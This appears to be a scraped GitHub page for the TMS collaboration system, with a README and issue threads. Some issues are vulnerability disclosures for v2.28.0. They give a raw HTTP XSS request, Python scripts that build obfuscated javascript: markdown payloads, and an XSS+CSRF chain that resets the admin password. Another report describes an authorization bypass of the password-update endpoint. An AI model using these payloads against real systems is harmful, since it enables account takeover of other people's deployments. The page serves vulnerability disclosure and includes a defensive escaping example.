xiweicheng / tms


A responsive, open-source web team-collaboration system: channel-based team communication plus a lightweight task board, a team blog/wiki supporting Markdown, rich text, online spreadsheets and mind maps, and i18n translation management.

Home Page: https://gitee.com/xiweicheng/tms/wikis/Home

License: MIT License

Java 14.19% CSS 25.13% JavaScript 48.91% HTML 11.32% Shell 0.04% Dockerfile 0.01% Less 0.09% SCSS 0.31%
Topics: slack, gitter, chat, group, translation, translate, webchat, tms, blog, markdown

Introduction

TMS(Teamwork Management System)


Code repositories:

Front-end code repository (the front-end code is already minified and bundled into the tms repository):

User manual

How to run

Screenshots

  • Landing page
  • Communication
  • Blog posts
  • i18n translation

GIF demos

Landing page

Internationalised translation

Team communication

Team blog (wiki)

Responsive design for mobile

Features:

Communication (real-time messaging over WebSocket)

  • Channels (group communication, with two-level topic threads)
  • Private chat (one-to-one)
  • Markdown syntax support (content layout is no longer monotonous)
  • @mentions, starred messages, rich-text message table of contents
  • Channel external links (so a team can keep its frequently used links in one place)
  • Channel Gantt chart (for overall project planning)
  • Channel task board (drag and drop)
  • Channel pinned messages
  • Schedules (with reminders)
  • To-do items
  • Tag messages with emoji and labels (for categorised filtering and search)
  • Upload images from the clipboard, upload files by drag and drop
  • File upload; import Markdown tables from CSV and Excel
  • Email, desktop and toastr notifications (so you never miss anything)
  • Hotkey support (too much mouse clicking gets tiring)
  • Custom skin colour scheme
  • Custom channel groups (to @mention a whole group of people at once)
  • More convenient features waiting to be discovered

Team blog (wiki)

  • Blog spaces (for organising posts, with permission isolation)
  • Multiple post types: Markdown, HTML rich text, spreadsheets, mind maps and charting tools
  • Create posts from templates (private or public templates can be published freely)
  • Post table of contents (drag-and-drop ordering) and tags
  • Parent/child posts (up to five levels)
  • Post following, favourites, history (version comparison and rollback), permissions, likes, sharing, open guest access
  • Post comments
  • Multi-user collaborative editing of posts (requires the post collaboration permission to be enabled)
  • Export to PDF, Markdown, HTML, Excel and PNG
  • Real-time post update notifications over WebSocket (more timely collaboration)
  • Complete audit history of post changes and a notification message centre
  • More convenient features waiting to be discovered

Internationalisation (i18n) translation management

It includes the following core modules:

  • Translation project management
  • Translation language management
  • Translation import and export
  • Translation management

Other features

  • System settings
  • User management

Sponsorship

  • Sponsor via Alipay transfer
  • Sponsor via WeChat Pay transfer
  • Or sponsor through the sponsorship entry provided by the project.

Disclaimer

The TMS project uses many excellent third-party open-source dependency libraries. If you plan to use TMS for commercial purposes, some of these dependencies may involve copyright licensing and paid purchase; please contact the vendors and purchase the relevant licenses for those dependencies yourself. TMS hereby declares that it accepts no legal liability for any copyright disputes or infringement that may arise. Thank you for your interest in and encouragement of TMS!

License

MIT

People

Contributors: bingdian-s, dependabot[bot], jaiminpan, lightstudio2020, wlzc, xiwc, xiweicheng


Issues

There is a cross-site scripting vulnerability in tms

[Suggested description]
A Cross Site Scripting (XSS) vulnerability exists in tms. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Affected Component]
POST /tms/admin/setting/mail/createOrUpdate HTTP/1.1
Host: localhost:8080
Content-Length: 113
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/setting
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=CDC518A82EFF7D857356EBF9AB4206D2; locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645601594
Connection: close

host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&username=someone%40163.com&password=&addr=&=

[Attack Type]
Remote

[Impact Code execution]
true

[Vulnerability proof]
1. Access URL: http://localhost:8080/tms/admin/setting and enter the system settings interface.

2. Enter JS code in the form: <script> alert ("XSS") </script >

3. Click Save to trigger a pop-up window; the vulnerability has been reproduced.

4. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.

About label tag handling

At present I have found two problems with label tags, as follows:

  1. Every time translations are imported and a new label is added, the database creates two identical label records. The cause is that importController executes both the add and update methods. I am not sure whether a check needs to be added here?

         translate.setUpdateDate(new Date());
         translate.setUpdater(WebUtil.getUsername());
    
         Label label = new Label();
         label.setCreateDate(new Date());
         label.setCreator(WebUtil.getUsername());
         label.setName(updateLabel);
         label.setStatus(Status.New);
         label.setTranslate(translate);
    
         lblUpdated.add(label);
    
         translate.getLabels().add(label);
    
         translate.setSearch(translate.toString());
     }
    
     Mail mail2 = Mail.instance();
    
     if (lblUpdated.size() > 0) {
         labelRepository.save(lblUpdated);
         labelRepository.flush();
    
         mail2.addHref("更新", baseURL, translateAction, projectId,
                 updateLabel);
     }
    
     translateRepository.save(translates3);
     translateRepository.flush();
    
     // only newly created translations get labelled
     String[] lbls = new String[0];
     if (StringUtil.isNotEmpty(labels)) {
         lbls = labels.split(",");
     }
    
     List<Translate> translates = translateRepository.save(translates2);
     translateRepository.flush();
    
     // label the newly created translations
     String newLabel = "N" + DateUtil.format(new Date(), DateUtil.FORMAT8);
     List<Label> lblNew = new ArrayList<>();
     // set the search attribute of the newly created translations
     for (Translate translate : translates) {
    
         Label label = new Label();
         label.setCreateDate(new Date());
         label.setCreator(WebUtil.getUsername());
         label.setName(newLabel);
         label.setStatus(Status.New);
         label.setTranslate(translate);
    
         lblNew.add(label);
    
         translate.getLabels().add(label);
    
         Set<Label> labels2 = new HashSet<>();
         for (String lbl : lbls) {
             Label label2 = new Label();
             label2.setCreateDate(new Date());
             label2.setCreator(WebUtil.getUsername());
             label2.setName(lbl);
             label2.setStatus(Status.New);
             label2.setTranslate(translate);
    
             labels2.add(label2);
         }
         labelRepository.save(labels2);
         labelRepository.flush();
    
         translate.getLabels().addAll(labels2);
    
         translate.setSearch(translate.toString());
    
         log(Action.Create, Target.Translate, translate.getId());
     }
    
     translateRepository.save(translates2);
     translateRepository.flush();
    
  2. On the translation search page, when a translation's label is deleted manually and the page is refreshed, the page reports an error. This is probably because the corresponding label for the translation field cannot be found in the database. I suggest adding an error-tolerance mechanism, or adding permission management for label deletion.

docker-compose up -d needs docker login

root@cloudcone:~/tms# docker-compose up -d
Pulling db (xiwc/tms-mysql:)...
ERROR: The image for the service you're trying to recreate has been removed. If you continue, volume data could be lost. Consider backing up your data before continuing.

Continue with the new image? [yN]y
Pulling db (xiwc/tms-mysql:)...
ERROR: pull access denied for xiwc/tms-mysql, repository does not exist or may require 'docker login'

tinymce

Markdown feels a bit weak. The interface is similar to Confluence, but the editor is really... What framework is used for the front end? It doesn't feel easy to modify. I'd like to bring in tinymce; could the author give me some pointers?

There are cross-site scripting vulnerabilities in tms

[Suggested description]
I found many cross-site scripting (XSS) vulnerabilities in tms (markdown XSS). Every edit or comment page with markdown may have this vulnerability. There are too many to list.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Vulnerability proof]
Every markdown page may have XSS. Here I choose this page:
http://localhost:8080/page/index.html#/chat/@super

Enter the PoC here and send the message.

[click here](javascript:{onerror=eval}throw'=eval\x28String.fromCharCode\x2897,108,101,114,116,40,49,41\x29\x29')

The browser alerts 1.

[Exploit scripts]:
code = """alert(1)""" # js code here
result = ''

ascii_values = [str(ord(char)) for char in code]

for value in ascii_values:
    result += (value + ',')

result = result[:-1]
final = "[click here](javascript:{onerror=eval}throw'=" + f"eval\\x28String.fromCharCode\\x28{result}\\x29\\x29')"
print(final)

[Repair Suggestion]
Change to another Markdown component, or add a filter in the backend to check for XSS attacks when storing into MySQL.

[With CSRF vulnerability]
There is a CSRF vulnerability; we could use XSS + CSRF to change the admin's password.
This is the update-password HTTP packet:

POST /admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 32
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099; JSESSIONID=9F0DF9ABD117D0289143D1B75E19E15A; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1701867716
Connection: close

username=super&password=12345678

Exploit script:

code = """var xhr = new XMLHttpRequest();
var url = 'http://localhost:8080/admin/user/update2';
xhr.onreadystatechange = function() {
if (xhr.readyState === XMLHttpRequest.DONE) {
if (xhr.status === 200) {
console.log('success!');
console.log(xhr.responseText);
} else {
console.error('failed' + xhr.status);
}
}
};
xhr.open('POST', url, true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
var postData = 'username=super&password=hacker123';
xhr.send(postData);""" # js code here
result = ''

ascii_values = [str(ord(char)) for char in code]

for value in ascii_values:
    result += (value + ',')

result = result[:-1]
final = "[click here](javascript:{onerror=eval}throw'=" + f"eval\\x28String.fromCharCode\\x28{result}\\x29\\x29')"
print(final)

Send the message and open the console. Click the message.

Log out and log in again; the password has changed!
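The two XSS reports above come down to the same two rendering mistakes: a stored value (the mail "port") is written into the page without HTML escaping, and a markdown link destination is emitted without checking its scheme. The following is an added example, not code from the tms project, showing the defensive side of both: context-aware HTML escaping plus a URL-scheme allowlist for link destinations, checked with the exact payloads from the issues. The function names and the base URL are my own.

```javascript
// Added example (not tms project code): escape untrusted text for HTML
// and allow only safe URL schemes in link destinations. Both the
// "<script>" stored in the mail "port" setting and the "javascript:"
// markdown link from the issues above are neutralised by these two steps.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Escape the five characters that can break out of HTML text or attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Return the href if its scheme is allowed, otherwise null. Parsing with the
// WHATWG URL parser gives the same scheme the browser will see: case is
// folded and embedded tabs/newlines are ignored, so "JavaScript:" and
// "java\tscript:" are still rejected. Run this on the *decoded* markdown
// destination (after entity references have been resolved).
function safeHref(href) {
  let url;
  try {
    // Relative links resolve against a dummy base and inherit its scheme.
    url = new URL(String(href), "https://base.invalid/");
  } catch {
    return null; // unparsable destination: drop the link
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? String(href).trim() : null;
}

// Render a markdown link as an HTML anchor; unsafe links degrade to text.
function renderLink(text, href) {
  const safe = safeHref(href);
  if (safe === null) return escapeHtml(text);
  return `<a href="${escapeHtml(safe)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`;
}

// Render a settings value (e.g. the mail "port") into a page as text only.
function renderSetting(name, value) {
  return `<td>${escapeHtml(name)}</td><td>${escapeHtml(value)}</td>`;
}
```

Scheme filtering is a second line of defence behind a Content-Security-Policy that forbids inline script; it does not replace output escaping, which is what the first report actually needs.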

Performance problem

Has anyone else found that the site is often very laggy after deployment? I deployed it on an Alibaba Cloud 2c4g instance with no memory or CPU limits, but I habitually cannot log in to the web page; it always gets stuck on a page with the ws connection. Does this place requirements on machine performance?

Login problem

Is there an administrator account? Can registration be done without entering an email address? Registration fails with an email error prompt.

There is an Insecure Permissions vulnerability in tms

[Suggested description]
There is an ultra vires vulnerability in the function of modifying personal information in TMS. The vulnerability originates from /TMS/admin/user/Update2. The administrator account and password can be modified beyond the user's authority by modifying the packet parameters.

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Affected Component]
POST /tms/admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

[Attack Type]
Remote

[Vulnerability proof]

1. Access http://localhost:8080/tms/admin with the test account.

2. In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account: admin, default password: 88888888.
Now I log in to the test account to try to change the information and password of the admin account.

3. Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.

4. Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set to change123 in the form submission, and other information is not changed. Open the Burp Suite packet-capturing proxy -> click the confirm submit button.

5. Modify the captured packet data, as shown in the following figure.

6. Click forward to finish the modification.

Viewing admin's information shows that it has changed. Vulnerability reproduction complete.
